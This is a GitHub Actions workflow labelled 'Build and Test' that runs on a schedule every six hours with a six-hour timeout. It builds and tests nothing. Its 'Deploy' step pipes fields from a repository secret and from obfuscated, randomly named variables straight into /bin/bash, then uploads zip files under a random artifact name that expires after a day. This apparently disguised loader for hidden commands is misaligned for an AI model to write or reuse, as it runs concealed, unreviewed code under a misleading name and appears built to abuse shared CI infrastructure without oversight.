name: Build and Test
on:
  workflow_dispatch:

  schedule:
    - cron: '34 3,9,15,21 * * *'
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  dispatcher:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
      - name: Deploy
        env:
          w5: ${{ secrets.w5 }}
        run: |
          printf '%s' "$w5" | jq -r .fcwo0235 | /bin/bash
          printf '%s' "$bajxc8241" | jq -r .jm420 | /bin/bash
          printf '%s' "$nolw375" | jq -r .xdrl2 | /bin/bash
          echo $iedrl2 | jq -r .og2212 | /bin/bash
          printf '%s' "$xol680" | jq -r .uf18357 | /bin/bash

      - name: Save results
        uses: actions/upload-artifact@v4
        with:
          name: ZlvN65GV
          path: "*.zip"
          retention-days: 1
